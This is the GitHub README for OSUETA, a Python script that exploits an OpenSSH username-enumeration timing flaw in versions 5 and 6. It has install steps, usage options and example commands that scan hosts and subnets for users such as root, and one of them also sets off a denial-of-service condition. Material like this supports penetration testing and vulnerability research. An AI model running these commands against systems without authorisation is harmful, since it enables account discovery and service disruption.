-
Notifications
You must be signed in to change notification settings - Fork 52
/
Copy pathREADME
93 lines (63 loc) · 3.78 KB
/
README
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
***************************************************************************
* ___ ___ ___ _ _ *
* / _ \ _ __ ___ _ _ / __/ __| || | *
* | (_) | '_ \/ -_) ' \\__ \__ \ __ | *
* \___/| .__/\___|_||_|___/___/_||_| *
* |_| *
* _ _ ___ _ _ *
* | | | |___ ___ _ _ | __|_ _ _ _ _ __ ___ _ _ __ _| |_(_)___ _ _ *
* | |_| (_-</ -_) '_| | _|| ' \ || | ' \/ -_) '_/ _` | _| / _ \ ' \ *
* \___//__/\___|_| |___|_||_\_,_|_|_|_\___|_| \__,_|\__|_\___/_||_| *
* *
* _____ _ _ _ _ _ _ *
* |_ _(_)_ __ (_)_ _ __ _ /_\| |_| |_ __ _ __| |__ *
* | | | | ' \| | ' \/ _` | / _ \ _| _/ _` / _| / / *
* |_| |_|_|_|_|_|_||_\__, | /_/ \_\__|\__\__,_\__|_\_\ *
* |___/ *
***************************************************************************
What's OSUETA?
Osueta it's a simple Python2 script to exploit the OpenSSH User Enumeration Timing Attack,
present in OpenSSH versions 5.* and 6.*. The script has the ability to make variations
of the username employed in the bruteforce attack, and the possibility to establish
a DOS condition in the OpenSSH server.
http://seclists.org/fulldisclosure/2013/Jul/88
Authors:
c0r3dump3d | coredump<@>autistici.org
rofen | rofen<@>gmx.de
We want to give the thanks to Javier Nieto from www.behindthefirewalls.com for his support and help.
Advice:
Like others offensive tools, the authors disclaims all responsibility in the use of this script.
Installing:
# apt-get install python-ipy python-nmap
# pip install paramiko
# git clone https://github.com/c0r3dump3d/osueta.git
Usage:
OpenSSH User Enumeration Time-Based Attack
usage: osueta.py [-h] [-H HOST] [-k HFILE] [-f FQDN] [-p PORT] [-L UFILE]
[-U USER] [-d DELAY] [-v VARI] [-o OUTP] [-c VERS]
[--dos DOS] [-t THREADS]
OpenSSH User Enumeration Time-Based Attack Python script
optional arguments:
-h, --help show this help message and exit
-H HOST Host Ip or CIDR netblock.
-k HFILE Host list in a file.
-f FQDN FQDN to attack.
-p PORT Host port.
-L UFILE Username list file.
-U USER Only use a single username.
-d DELAY Time delay fixed in seconds. If not, delay time is calculated.
-v VARI Make variations of the username (default yes).
-o OUTP Output file with positive results.
-l LENGTH Length of the password in characters (x1000) (default 40).
-c VERS Check or not the OpenSSH version (default yes).
--dos DOS Try to make a DOS attack (default no).
-t THREADS Threads for the DOS attack (default 5).
Example:
* A single user enumeration attempt with username variations:
./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes
* A single user enumeration attempt with no user variations and with dos attack:
./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes
* Scanning a C class network with only one user:
./osueta -H 192.168.1.0/24 -p 22 -U root -v no
* Scanning a C class network with usernames from a file, delay time 15 seconds and a password of 50000 characters:
./osueta -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50